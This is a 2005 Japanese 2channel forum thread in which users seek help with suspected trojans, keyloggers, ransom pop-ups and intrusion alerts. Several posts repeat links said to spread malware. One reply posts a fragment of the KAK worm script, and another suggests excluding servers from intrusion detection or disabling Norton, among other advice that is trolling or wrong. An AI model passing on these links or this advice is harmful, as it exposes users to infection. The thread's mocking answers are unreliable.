このソフトで圧縮されてるファイルをスキャンしたらトロイの木馬が発見されたんですけど解凍しないで削除したんで感染はしてないんですか？
初心者なんで教えてください！

板違いかもしれないけど、教えてチョ。
http://www2.elecom.co.jp/products/LD-BBR4L3.html
オイラね、上記のルータもってるんだけど、XBOXとPS２にDMZ機能を使っておうと思うんだ。
そしてPC一台はDMZを使わずに接続しようと思うんだ。
XBOXとPS2はDMZにしても安全そうな気がするんだけど、どうかな？
それとDMZ機能は指定したIPアドレスのクライアントだけをWAN側に解放する機能だから
XBOXとPS2にDMZを使っても、IPアドレスが違うPCの方は安全だよね？

前にも同じ事他で聞いたけど、その時はPCは安全じゃないって言われたんだ。
でもDMZ機能をネットで検索して少し勉強してみたら、安全そうに思えてきたんだよね。
どうなんだろう？

キーロガーに感染したみたいなのですが、
確認する方法とかってありますか？
Spybot、Ad-Aware、ウィルスバスターなどで検索したのですが
それらしいものがHITしなかったのでよろしければお願いします。

＞キーロガーに感染したみたい
どうやって知ったんだ？

２ちゃんねるに外国ソフトウェアのリンク
　　　　　　　　↓
DLして実行してみる（検索してもウィルスと出なかった。）
　　　　　　　　↓
何にも起きない
　　　　　　　　↓
他のウィルスソフト使ってる人がキーロガーじゃんと言う（複数）
　　　　　　　　↓
　　　　　・・・・・・・・・
ですorz

>>420
そんな２ちゃんねる上の不特定多数の発言を信じるより、自分自身を信じろ！
感染したと出なかったら、感染していないんだよ！もっと自分に自信を持て！

>>421
いやいや、発言を信じたわけじゃないよ、
自分でその人が言ってたウィルスソフト入れて検索したらキーロガーだったんだよ。

>>418=>>422だったら、発言が矛盾している＆おまえはもう解決している

>>423
だといいんだが・・・
>>442
のウィルスソフトで検索したときにHITしたのはDLした元のファイルが検出されただけで、
レジストリとかのほうでは１つもでてこなかった
実行して感染してないならそれに越したことはないのだが
どうも納得がいかない、元のファイルを駆除すればキーロガーが消えるというのなら別なのだが・・・。

>>442じゃなくて>>422なorz

（　＾３＾）≡○#) ３・）∴.;

age

【使用OS】 2000
【WindowsUpdateしてるか】 してる
【AntiVirusは何を使っているか】 Mc Afee
【ちゃんとUpdateしてるか】 自動
【スキャンした結果（ウイルス名・発見場所）】 見つからない
Mc Afee が駆除しようとするファイルのみ
【別のオンラインスキャンしたならその結果は】 見つからない
【症状を具体的に、分かる限りすべて書く】
ダウンロードしようとしたたEXEファイルに見つかる
キャッシュされた時点でMc Afee が駆除
いくつかのダウンロードサイトや、企業ページから
ダウンロードしようとしても状態が変わらないので
常駐していて、EXEに組み込まれるのだと思われる
【何をしたらそんなことになったのか】 不明
【これまでにとった措置】
ウイルスの情報を調べたが載っていない
検知された名称はProcKill-DF

亜種がいくつかありそれぞれ駆除方法や症状が異なるようだ。
新種と思われるので情報が欲しい
駆除方法・感染源・症例・発生分布 等

ttp://www.mcafee.com/japan/security/virPQ.asp?v=Prockill-DF

今日家のパソコンを立ち上げたら、突然画面の表示が大きくなっていました。
コントロールパネル等で色々試したのですが、設定が元に戻りません・・・。
これってウィルスの仕業なんでしょうか？
前の日に韓国の、PVの見れるサイトを見たことが原因かなと思っているんですが、
わかる方いらっしゃったら何か教えてもらえないでしょうか？？
よろしくお願いします。

>>428
１　トロイみたいだから、プロセス見る。
２　おかしなプロセスあったら切る。
３　スキャン。
４　セーフモードでスキャン。

これしか、手立てが今のところないのでは？

あと、システムを復元しないにして、スキャンする。

>>430
再起動したか？

>>433
何回もしたんですけど、やっぱり直らないんです・・・・。

>>434
ドライバ上書きしてみたら？
それ以前にサポートに電話した方が早そうだが。

>>435
ドライバ上書きとは？？
文字を打ち込むとき、半角全角キーを押すと、「、」が入力されるんですけど、
完全にやられてるかな？

>>430
突然画面の表示が大きくなってとは解像度が変わったと言う事かな
まあ、今の処ウィルス等では無いと思う設定がPVを見て変えられたの
では無いだろうか

画面のプロパティの設定の解像度はどうなってるよ

解像度って、１６色というやつ？
すいませんど素人で・・・

なわけないだろ！

>>437
PVを見たとき、フルスクリーンにして見ていたんです。
なんか、そのサイズになってしまった感じです・・・。

>>439
それは画面の色
横に解像度あるでしょ

泣泣

小、６４０x４８０ピクセル？？

>>430
安心しろ!!ウィルスでは無いからｱｯﾁ(･∀･)ｲｹ!!

こんぶとわかめの違いって何ですか?
どちらもウイルス対策ソフトは反応しないですよね?

tp://tmp5.2ch.net/test/read.cgi/youth/1132171754/

ついうっかりしていて上記スレの>>1を踏んでしまいました・・・。
悪質なウィルスみたいです。一応ノートンを使用していて、
高危険度と出て削除はしてくれましたが心配です。
ノートンだけじゃ検出できないウィルス等、入っているのでしょうか？
今のところは何もないのですが念のためスキャン中です。
何か起こらないかとても怖いので、
優しい方がいましたらノートンだけで安全だったかどうか教えて下さい。

【使用OS】 WinXP プロフェッショナル
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 Norton
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 今やってます。今のところは無しですが・・・
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 今のところは何もありません
【何をしたらそんなことになったのか】 上記スレの>>1のURLをうっかりクリック
【これまでにとった措置】 スキャン中
【その他の質問】 もし、ひどいウィルスだったとすればどのような措置をとればいいのか。

うっかりって…
自分自身のセキュリティの管理能力だろ！
甘いんじゃねぇの？

>>447
なにが優しい方だよ氏ね

>>447
http://camluver.com/main.html
ここが詳しいので読んでみたらどうですか

>>447
優しい方だよ〜それは災難だったね。君の恐怖を取り除いてあげよう
リカバリをしたまえそれが一番効果的だよ

>>448
甘いかどうかしゃぶってみよう

（　＾３＾）≡○#) ３・）∴.;

あンまああぁぁぁぁ〜〜〜〜ぃぃぃいい(*´Д｀*)

これ踏んでしまったんですが大丈夫でしょうか？
とりあえず強制終了しました。
ノートン先生が反応して修復できませんでした。とか言われました
http://stillwater.bravehost.com/cast/Lena.html

>ノートン先生が反応して修復できませんでした。
でなにが
>大丈夫でしょうか？

　　なんだよアホが！

今すぐセーフモードでスキャンしろ
駄目だったら、リカバリな。

修復できなきゃ削除しろってことだな

最近ずっと思ってたんだけてたんだけど、
セーフモードでスキャンて何？&どうやるの？

おまいは知らんでいい

>>459
>460では可哀想なのでﾁｮｯﾄ解説しちゃうど。

セーフモードっつーのは、必要最小限の構成で立ち上がるのな。
んだから、悪さをする奴は寝ている可能性が高いんよ
ほんでもって、アンチウィルスとアンチスパイでスキャンすると見っけてから
やっつけられる可能性が高いのな。
んだから、使用中で削除出来ないってことが無くなるっつーわけなんよ

セーフモードの立ち上げ方はOSによって違うんで調べておくれ。

tp://www.albinoblacksheep.com/flash/open.html

↑これってウイルス何でしょうか？
ノートンインターネットセキュリティーは無反応でした。

>>462
ブラクラ　ウィルスのカテゴリーじゃない

（　＾３＾）≡○#) ３・）∴.;

＞＞４６３ありがと

http://sportsnavi.bravehost.com/fight/headlines/20051119-00000009-kyodo_sp-spo.html

ここのページを踏んでしまったのですが、どういったものなんでしょうか？

>>466
>>1

tp://sportsnavi.bravehost.com/fight/headlines/20051119-00000009-kyodo_sp-spo.html

【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 検索中です
とりあえず　HTML　CRINET.Aというのが見つかりました。
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 現状特にありません。
【何をしたらそんなことになったのか】 上のアドレスをクリック
【これまでにとった措置】 スキャン中
【その他の質問】 対処方法　トロイ関連の場合　何かいいフリーのソフトが
あれば教えてください。

>>468
鑑定人の方？

>>469
踏んだものです

誰かravを使っている人はいませんか？
どっかのテストではnod32よりも速くて検出力が高いんですが

> どっかのテストではnod32よりも速くて検出力が高いんですが
それ信用するのですか？ｗ

鑑定していただける方お願い致します

>>473
とりあえず鑑定した当人に聞いてみれば・・・
http://etc3.2ch.net/test/read.cgi/entrance/1131357853/

>>471
Windows版なんかあったんだ。なんにせよMSに買収されたから売ってないだろ。
そもそも日本ローカルにはほとんど未対応だろうし。

tp://K1Dynamite.bravehost
【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 検索中です
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 現状特にありません。
【何をしたらそんなことになったのか】 上のアドレスをクリック
【これまでにとった措置】検索中
IEが応答なしになって数秒後、DOS画面が4つぐらい出てWarez？みたいな文字が一瞬出て消えました
もうこれはリカバリーしかないでしょうか？

【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 ウイルスバスター
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 検出されず
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】 たまに画面が一瞬真っ暗になる。すぐ元に戻る。
【何をしたらそんなことになったのか】 わからない
【これまでにとった措置】なにも

何かのウィルスでしょうか？

>>468
俺もＫ−１のスレで感染し、ノートンに報告した。
ノートンからの返答があって・・・・

ファイルを分析しました。送られたそれぞれのファイルについてわかったことを
以下に報告します。
（略）　　　
このファイルは悪質なものではありませんが、あなたのコンピュータ上で知らないうちに動作しています。このファイルを削除することをお勧めします。

との返答がありました。少し安心・・・・
バスターにも報告しておいたほうがいいかも

>>478
ありがとうございます。
連絡してみようかな。悪質じゃないけど、知らないうちに動作しています？ってのが
若干気になりますね。

このファイルってのはどういったファイルなんですか？

【使用OS】 WinXP SP2
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 nortonとAVG
【ちゃんとUpdateしてるか】　してます
【スキャンした結果（ウイルス名・発見場所）】　検出できず
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】ネットに繋ごうとするとブルーアウト
エラーメッセージがでる
【何をしたらそんなことになったのか】　不明
【これまでにとった措置】エラーメッセージに従いチェックディスク　その他デバイスも調査するも
異常なし
【その他の質問】セーフモードではネットに繋げます。今もセーフモードで書き込み

アップルの「iTunes」に深刻な脆弱性--マシン乗っ取りのおそれ
http://www.japan.cnet.com/news/sec/story/0,2000050480,20091217,00.htm

　Appleの音楽管理ソフト「iTunes」の一部のバージョンに深刻な脆弱性が見つかった。
この脆弱性を悪用されると、攻撃者にリモートからコンピュータを乗っ取られる可能性があると、
あるセキュリティ調査会社注意を呼びかけている。

>>1が調子にのってウィルス貼りつけて、被害者が続出。
もはや「ごめんなさい」じゃ済まされなくなりました。
被害総額も数千万〜億までのぼりそうです。
>>1が逮捕されるのを応援しましょう。

↓のスレの>>1のURLは絶対に踏むなよ？ウィルスだから。
ノートン先生も通用しないウィルスです。
もし踏んでしまったらBitDefenderで駆除してね。PCぶっこわれますから
http://life7.2ch.net/test/read.cgi/diet/1131084978/

>>482
平気で踏んだぞお　WindowsUpdateしているから全然関係ない
そんなのもうウィルスじゃない

>>482
最近多いんだよなぁ、「？」の使い方すら分からんやつ。
日本語の乱れとか、そんなレベルじゃない。情けなさ杉。

同感だが2chで言う台詞じゃないな？

（　＾３＾）≡○#) ３・）∴.;

>>485
馬鹿には通用しないぞ

（　＾３＾）≡○#) ３・）∴.;

他のウィルスを削除する機能を持ったウィルスが標準装備されてます。

>>255とほぼ同じ症状なんですが、
よく出てくるデリバリというのはどうやれば良いのでしょうか？
ぐぐっても分からなかったので、教えてください。

あと、フォーマットして再インストすればウィルスって大体消えますか？
色々面倒なら、フォーマットしちゃおうかと思っているのですが･･･。

カリクビー ってのも有るんだが・・・

>>490
ググるなら「リカバリ」でググること。

（　＾３＾）≡○#) ３・）∴.;

VIPから対処方法聞きにきますた

ちょｗｗｗﾔﾊﾞｽｗｗｗｗｗｗｗ
http://ex14.2ch.net/test/read.cgi/news4vip/1132484340/l50


84 名前： 以下、名無しにかわりましてVIPがお送りします 投稿日： 2005/11/20(日) 20:19:14 ID:WxZ6h84Y0
ウィルス名はhappy MAD-0922
まだ世間に広まってないワーム＋トロイみたいな物で、かなりの悪影響がある。

アメリカ(Gyao)ではこのウィルスも対策に取り組んでいる


124 名前： 以下、名無しにかわりましてVIPがお送りします 投稿日： 2005/11/20(日) 20:27:34 ID:WxZ6h84Y0
あっ、MAD-0922について調べたらこれは発祥がアブガニスタンで、Gyaoの攻撃用に作られたウィルスだそうだ。
政府のＰＣでも麻痺させてなんかするのかな？

とにかく通報した


このウィルスの対処方法とかないのでしょうか？

>>1
http://www.lakoff.com/login/yahoo/
http://virus.org.ua/unix/woid.jpg
http://yaplog.bravehost.com/kouki_aya_love2/

　|　　お　　や　　す　　み　　ぃ　　ぃ　　ー　　！　 　　 |
　＼＿　 ＿＿＿＿_　_＿＿＿＿__　 ＿＿＿＿_　＿／
　　　　∨　　　　　　∨　　　　　　　∨　　　　　　∨
　　∧ ∧　　 　　 ∧ ∧ 　　　　∧ ∧　　　　　∧ ∧
＼（*´∀｀）　 ＼ (　・３・)　　 ＼（*・∀・）　　＼( ﾟДﾟ)
　（＿＿）　　　　（＿＿）　　　 （＿＿_）　　　 （＿＿）

>495踏むなよ
ソースチェッカーオンラインを使いましょう。
http://so.7walker.net/guide.php?
>ソースチェッカーオンラインは、ブラクラのチェックソフトとして開発してきた
>ソースチェッカー（開発終了）というソフトのオンライン版になります。
>主な機能として、ブラクラチェックの他に、画像判別、文字コードの変換（EUC）、
>Content-Type判別、サイトのプレビュー表示（ドメイン名の場合のみ）などがあります。

最近ﾊﾟｿｺﾝを起動しても、画面がつきません。
これはウイルスの仕業ですか？
XPです

>>497
バカのせいです

>>497
完全にウイルスのせい

他スレでNOD基地外の荒し宣言を見つけた。

>NOD32アンチウィルス Part24
>457 名前：名無しさん＠お腹いっぱい。　[sage]　投稿日：2005/11/20(日) 16:47:32
>ノートンは糞、何度でも言ってやるよｗｗ
>そこらじゅうで言ってやるぜｗｗ

あちこちのスレにも荒しぶりが書いてた。

>セキュリティ板などにインチキな比較画像をコピペしたのもNOD厨だった。
>http://tmp5.2ch.net/test/read.cgi/tubo/1120964614/321-329

>他の製品も相当な被害に遭っているし・・・・。
>http://pc8.2ch.net/test/read.cgi/sec/1132160664/6-10

【使用OS】 XP proSP2
【WindowsUpdateしてるか】してます
【AntiVirusは何を使っているか】 ノートン2005
【ちゃんとUpdateしてるか】 してます
【スキャンした結果（ウイルス名・発見場所）】 発見できず
【別のオンラインスキャンしたならその結果は】 ↑同様
【症状を具体的に、分かる限りすべて書く】

結構前からなのですが、ネットワーク接続をした状態でWindowsを起動すると
毎回下記のようなメッセージが表示されます。

Norton Internet Worm Protectionが侵入の試みを検出して遮断しました。
セキュリティルール：Default Block Bla Trojan horse
パス：N/A
ファイル名：N/A
方向：インバウンド
ローカルアドレス：
ローカルポート：1042
リモートアドレス：
リモートポート：1042
プロトコル：UDP

不正アクセスを防いでるというのは分かるんですが、毎回起動する度に出るので怖く感じます。
ウイルススキャンしても何も検出されないし、スパイウェアスキャン等しても変化なし。
このメッセージが出ないようにするにはどうすればいいのでしょか？

>>501
ノートンでまだ定義されていないトロイかスパイウェアに侵入されてる可能性あり

スパイウエアの検出なら、これを参考に汁。

>スパイウェアに対する検出力評価
>ttp://www.infoworld.com/article/05/09/19/38FEspy_1.html
>1位　F-Secure
>2位　Webroot
>3位　LANDesk
>4位　Sunbelt
>5位　SurfControl
>6位　McAfee
>7位　Trend Micro
>8位　eTrust
>9位　NOD32 v2.5

追記

>【別のオンラインスキャンしたならその結果は】 ↑同様

ノートン以外のAVメーカーのスキャンでも検出されないなら、トロイの可能性は低い。
スパイウエアの可能性があり。

相談にのってくれ！最近、しばらくネットを繋げて寝る前にシャットダウンすると、「他のユーザーが接続しています。」みたいなこと言ってくるんだよ！ADSLモデムで繋いでるだけだし、LAN繋いでないし、どういうこと！？

>>505
だから他のユーザーがつないでる

ある無料スキャンをしてみたら以下のものがでたんです。
ｊword
ｃmin

でもこのソフトはいれてないんですよね。どうしてでしょう？
また駆除する方法をおしえてください。

>>507
入れてないんじゃなくて入ってる
普通にアンインスコしる

>>508
ありがとうございまし。
普通にＰＣに元から入ってる機能ということでしょうか？

>>509
さあ？
何かのソフトに付随してついてきたりしてるから進入経路はわかりません
別にウイルスではないが気になるなら早めに消しとけ

>>510
ウイルスではないんですね。だから他のスキャンにはかからなかったのかあ
ありがとうございます。助かりました。

（　＾３＾）≡○#) ３・）∴.;

【使用OS】 Windows XP SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】　
ウイルス名　TSPY_VB.AP
発見場所C:\WINDOWS\SYSTEM32\IMEPADSV.EXE

【症状を具体的に、分かる限りすべて書く】
今のところ特にこれといった症状はありません
【何をしたらそんなことになったのか】
多分どこかのホームページでファイルをダウンロードしたとき
だろうと思うんですけどその時はウイルスバスターは反応
しなかったので・・・ちなみに自分ファイル共有ソフトは使ってません。

【これまでにとった措置】
ウイルスバスターでファイルを隔離できなかったので
手動で消そうとしましたがSYSTEM32フォルダの中にIMEPADSV.EXE
を見つけることができませんでした。
【その他の質問】
消してもよいファイルなら、このファイルの消し方をぜひ教えてください。
よろしくお願いします。

>>513
最新版にアップデートしてもう一回検索しろ

「すでに最新版にアップデートされています。
アップデートの必要はありません」と言われてしまいます・・・

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>513
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

最新の亜種みたい。サポセンに聞いた方がよさそう。

IMEPADSV.EXE ですがフォルダオプションの
「保護されたオペレーティングシステムファイルを表示
しない」のチェックを外すとみつけることができました。
その後セーフモードで削除に成功しました。

ご迷惑をおかけしました。

>>513
その注意力じゃ他にも感染してそうだから、とりあえずｎｙをアンインスコした方がいいんｼﾞｬﾏｲｶ？

　　　　　　.exe入りzipアーカイブを解凍後、
PCが勝手に再起動したのですが
これはウイルスの作用でありえるのでしょうか？
それともzip解凍時でのバグを突いたものや何かで
メモリ不足やバッファなんとかフローとかが起こったのでしょうか？

>>519
おまえが最新の解凍ソフトを使うようなセキュリティを気にするやつじゃないのなら、
何が起こっても不思議じゃない。

>>520
一応アーカイバは「変な場所にファイルが解凍されるバグ（？）」を修正した
Noah3.195と7-zip32.dll4.23です

ごちゃごちゃ言ってないでスキャンしろ

えっ？

スキャンしろ＝ウイルスの仕業

ｗｗｗｗｗｗ

質問お願いします
tp://sportsnavi.bravehost.com/fight/K1/20051125-00000008-kyodo_sp-spo.html
↑
ここを踏んで、マカフィーがトロイを削除してくれたのですが、
ウイルスの名前が「何とかwinボム」みたいな感じで、枠内が黒いウインドウが無数に出てきたり、
マイクロソフトテレネット（？）に接続します、というメッセージなどが出てきました。

もしマカフィーが入ってなかったら、いったいどんな事態に陥っていたのですか？

>>525
どうにもならぬ　バカにされているだけ

【使用OS】 XP SP1
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】 ノートンアンチウィルス2003
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】
スキャンしたウィルス名：Trojan Horse
kongbu[1].htm
場所：Temporary Internet Files\Content.IE5\PJQAWHUH
【症状を具体的に、分かる限りすべて書く】
自覚症状は特にありません
週初にスキャンした時は発見されませんでした
【何をしたらそんなことになったのか】
ここ数日はファイルのDLはしていません
画像の閲覧もしくはサイトの閲覧くらいしか考えられないのですが・・・
【これまでにとった措置】
ノートンでは削除できませんでした
直接駆除しようと思ったのですがTemporary Internet Filesの中に
Content.IE5\PJQAWHUHを見つけられませんでした
【その他の質問】
検索してみましたが削除方法が見つけられませんでした
対処方法などわかる方いらっしゃいましたら教えていただきたいです

>【WindowsUpdateしてるか】 していません
>【AntiVirusは何を使っているか】 ノートンアンチウィルス2003

　　　お帰り下さい。

>>527
コンパネ→フォルダオプションの
表示のすべてのファイルとフォルダを表示するにチェックを入れる

>>527
>【使用OS】 XP SP1

これも追加　九割方釣り

>>529
チェックは入っています
検索でファイルを直接探してみましたが
それでも発見されませんでした
>>528>>530
最新の物にアップデートしていなかったのは
確かに怠慢でしたが釣りではありません
よろしくお願いします

>>531
Temporary Internet Filesをスキャンすることは出来る？

一時ファイルなので、消したりしてないよね…

メールに添付が無かったら、ウィルスに感染することは無いですか？

いいえ

>>534
そんなこと心配してないでちゃんとWindowsUpdateしやがれ　タコ

>>534
Win98の俺ですらＷｉｎｄｏｗｓうｐだては欠かさないぞ！

>>532
再度PC全体にスキャンをかけてみています（こちらはまだスキャン中です）
Temporary Internet Filesだけもスキャンしてみましたが何も出ませんでした
>>533
数日前にファイルを削除しましたが
感染がわかったのは本日ですので消してはいないはずです

一回目のスキャンが終わった後にノートンの「検疫」の処理はしました
（検疫をするとウィルスが隔離されてスキャンでは引っかからなくなるのでしょうか？）
ただし「修復」はできなかったので駆除されていないと思ったのですが・・・
検疫というのはウィルスの削除の処理とは違うと認識していました
Temporary Internet Filesを開くとContent.IE5があるはずなんですよね？
それ自体を見つけられないということは私が何か間違えていますか？

検疫をするとウィルスが隔離されたんです。

いろいろと勘違いしていたようです
申し訳ありませんでした
検疫についてもヘルプや検索してみて納得しました
隔離されたファイルを削除してみます
どうもありがとうございました

>>527
基本的な用語くらいは覚えておこうよ。

Temporary Files＝一時ファイル

つまり、それを消せば全部無くなるのよ。

（　＾３＾）≡○#) ３・）∴.;

すいません、
こちらのページを踏んでしまいました。
鑑定スレにて激有害と判断され、対処法をお伺いしたく参りました。

ttp://daylinews.bravehost.com/Society/051106-00000107-kyodo-ent.html

どのような対処をしたらいいでしょうか？
スレ違いでしたらもうしわけございませんでした。

>>543
せっかくまったりしてんのにウィルス運んでくんな馬鹿

>>543
今すぐnetから切り離して、
ウィルスとスパイウェアのスキャンをしろ。

助けてください。
【使用OS】
WiｎXP
【WindowsUpdateしてるか】
していましたがウイルスで不可能に。
【AntiVirusは何を使っているか】
ノートン先生2004です
【ちゃんとUpdateしてるか】
しています。
【スキャンした結果（ウイルス名・発見場所）】
ウイルスはTrojのようです。
【別のオンラインスキャンしたならその結果は】
していません。感染を恐れて基本は接続なしです。
【症状を具体的に、分かる限りすべて書く】
ノートン先生のインストールアンインストールが不可能になりました。
そしてファイヤーウォールなどネットセキュリティ関連強制OFFです。
【何をしたらそんなことになったのか】
ファイルのDLと思われます。EXEファイルの起動等。
【これまでにとった措置】
ノートンでウイルスを見つけましたが削除が出来ませんでした。
加えて一度アンインストールしようとしたところもう起動できなくなりました、
【その他の質問】

>>543
糞VIPPERは死ねよｗｗ

　 ∧＿∧
　（　´∀｀）　　／￣￣￣￣￣
　（　　　　）　＜　>>546
　｜ ｜ ｜　　＼＿＿＿＿＿
　（_＿）___）

リカバリかけて、体制立て直したほうがいいんじゃない。

>>５４６追記です。
削除ツールSymNRT.exeでノートン先生を消したのですが
再インストール手順に必要なLRSetup.exe が起動せず。
ttp://service1.symantec.com/SUPPORT/INTER/tsgeninfojapanesekb.nsf/jp_docid/20050415150354953?Open&src=&docid=20040518180840958&nsf=SUPPORT%5CINTER%5Cnavjapanesekb.nsf&view=45d24f3809a3963288256db3005f48d1&dtype=&prod=&ver=&osv=&osv_lvl=

通常の方法で再インストールしても
「デスクがいっぱいです。ディスクファイルのクローズエラー」
で上手くいきません。

レジストリなどいじくってウイルスの猛威を無効化できるでしょうか？
もうノートン先生をあきらめてウイルスバスターを購入すべきでしょうか？

＞548
レスありがとうございます。

助けてください

【使用OS】 
W2Kpro SP4 
【WindowsUpdateしてるか】 
しています 
【AntiVirusは何を使っているか】 
avast 
【ちゃんとUpdateしてるか】 
しています 
【スキャンした結果（ウイルス名・発見場所）】 
発見されませんでした 
【症状を具体的に、分かる限りすべて書く】 
『シャットダウンはNTAUTHORITY￥SYSTEMによって開始されました』
のメッセージと60秒のカウントダウンが始まります
サッサーと同じ症状の様なのですが
システムプロセスのメッセージがサッサーとは違い
『C\WINNT\system32\services.exeは状態コード128で突然終了しました』
となっています
【これまでにとった措置】 
avastやオンラインで何度かスキャンしましたが何も見つかりません
検索してみてもサッサーの情報しかヒットしませんでした 

ウィルスによるものかどうかも解らないのですが
サッサーの症状に似ている様なのでここに書き込みました
宜しくお願い致します
  

>>550
それウィルスの可能性は少ない。
単なるシステム障害っぽい。

まず原因は、services.exeの異常終了により自動シャットダウンの繰り返し。
通常に起動してもムダ、普通にセーフモードもダメ。

対処としては、セーフモードのコマンドプロンプトでの起動。
起動するとコマンドプロンプトになるから、そこでexplorer.exeと入力してEnter。
これでエクスプローラが起動するのでタスクバーが使えるようになる。

後は、原因探しなんだけど・・・・
1）直近でインストールしたソフトがあればアンインストールしてみる（アプリケーションの追加と削除）
2）直近で充てた自動パッチを消去してみる。
3）イベントビューアをよく調べて、何が原因かを調査する。

こんなところ

2chの鯖からMSIE JavaScript OnLoad Rte CodeExec
というのを受け取ってしまうんですがこれは無害ですよね？
ウィルスとは違うのですがトロイ系？の質問スレなどが見当たらなかったので。。。

これは一体なんなんでしょうか？
ググッてもいまいち情報が出ないんですがこれが出てスレの取得ができないところがあります・・・。
対策などはあるんでしょうか？

>>552
kak.hta';ken=wd+'START
http://life7.2ch.net/test/read.cgi/diet/1133099812/










　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　（`・ω・´）ｙ−〜
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　~~~~~~~~~~~~~~~~~~~~~~~~~~

>>552
うちも今朝から。

もしかしてこれ踏まなかった？
//thumbstower.com/?pics/animals/pages/2161.jpg

関係あるかどうか分からんけど。

>>552
<ここ数日2chを騒がせている侵入検知トラップの対策法>

症状：
Norton Internet Securityを使用している人で、特定の文字列を書かれると侵入検知が多発し
最短30分間そのアドレスがNISにより規制されるためログが読めなくなる。

対策：上に行くほどおすすめ
�@Jane系の専用ブラウザ使ってる場合
JaneフォルダにReplaceStr.txtというテキストファイルを作り
onload＝[Tab]onload＝
みたいに置き換えればOK（↑の”[Tab]”はタブ入力）
Tabキーを押すのを忘れて[Tab]onloadとそのまま書いてはダメ(漏れそれやったｳﾞｧｶです)

�AReplace法が使えない場合(他の専用ブラウザ、IEなど)
Nortonの統計ログの侵入検知の項目を見て、ブロックされているサーバ名を確認(例:tmp5.2ch.net)
侵入検知の設定で除外に上で確認したサーバ名を入れる
ただしこの方法は穴を作ることになるのであまりおすすめではない

�Bよくわかんね、って人
読み書きするときに「Norton Internet Securityを無効にする」を選んで一時的にNISを切る。
このときAuto-Protectを切っても無意味なので注意。Auto-ProtectはAntivirusなので。

ガセビアの沼
・Love-letterと同じVB使った疑似ウイルスだからNAVの除外設定に専用ブラウザのログフォルダを入れてやればいい、というのはガセ
　今回のはNAVではなくNIS管轄のトラップです

【使用OS】 Windows XP Home Edition
【WindowsUpdateしてるか】 自動更新しています。手動で確認しましたが最新でした。
【AntiVirusは何を使っているか】 ウィルスバスター２００５
【ちゃんとUpdateしてるか】 しています。
【スキャンした結果（ウイルス名・発見場所）】 TROJ_KAPOD.P とでています。
【別のオンラインスキャンしたならその結果は】 マイクロソフトのスキャンでは以上なしと
【症状を具体的に、分かる限りすべて書く】 一定時間ごとに、この口座に金振り込めばなおります。
との画面いっぱいの表示がでます。（タスクマネージャーから消せる）
【何をしたらそんなことになったのか】 おそらく、エロ系のＨＰわたりあるいてるときだと、
３日前ほどに金払ってくださいという画面が出たきがします。（無視しました）
【これまでにとった措置】 ウイルスバスターで検索するも処理不可能で
ファイルを発見しましたがゴミ箱に捨てる、削除不能です。
【その他の質問」ウイルス名でググってみたら英語のＨＰのみでよく対処がわかりませんでした。
おねがいします。

>>556
スパイウェアだろうな。
以下のページをじっくり読むといいよ。
http://www.higaitaisaku.com/menu5.html

> ファイルを発見しましたがゴミ箱に捨てる、削除不能です。
プロセスとめるか、セーフモードだと削除できるよ。

すみません。>>558の名前は557の間違いですorz

>>557
ウイルスと思われるファイルをセーフモードにて削除後
指定されたＨＰにていろいろ対策を取りました。

ウイルス検索にて問題無しとなりました。
ありがとうございました。

【使用OS】
　　　XP sp2
【WindowsUpdateしてるか】
　　　してます
【AntiVirusは何を使っているか】
　　　ノートンアンチウイルス2006
【ちゃんとUpdateしてるか】
　　　してます
【スキャンした結果（ウイルス名・発見場所）】
　　　無反応
【別のオンラインスキャンしたならその結果は】
　 　無反応
【症状を具体的に、分かる限りすべて書く】
　　　メールが大量に送信されます。あて先はバラバラ。
　　　ただし、ノートン先生によって（？）ブロックされてます。
【何をしたらそんなことになったのか】
　　　わかりません。ただきっかけはWindows起動時に
　　　「システムは深刻なエラーから復帰しました」と表示されたときから。 　　
【これまでにとった措置】
　　　W32.〜てやつかと思い駆除ツール使いましたが発見されませんでした。

アップデートしても引っかからないんですが、まだ定義されてないウイルスでしょうか？
困ってます。よろしくお願いします。

http://enchanting.cside.com/security/spybot1.html
spy botのダウンロードページです。
関係ないかも知れないけど１回試してみてください。
いろいろみつけてくれますよ。

　 ∧＿∧
　（　´∀｀）　　
　（　　　　）　
　｜ ｜ ｜　　
　（_＿）___）

>>561

セーフモードでのスキャンはやってみましたか？

winnyのAntiny駆除を主とした対策ソフトを開発してみました。
ご意見ご感想をお聞かせいただければと思います。

現在Download板にてスレッド立ててみました。
よかったら参照を願います＾＾
http://tmp5.2ch.net/test/read.cgi/download/1133240829/l50

>>394
昨日から見られないんだ。

>>395 コレみたいだな。
うちは�Aか�Bなんだけど危なそうだなぁ・・・
他に対策あれば教えてくれ。

どう見ても誤爆です。
本当にすみませんでした。

>>555
＞特定の文字列
2chブラウザ使ってる場合これをNGワードに指定しても駄目なの？それで回避できてる気がするんだけど

>>567
ダメ。

窓の手で自動実行ファイルを見ると

MSPY2002

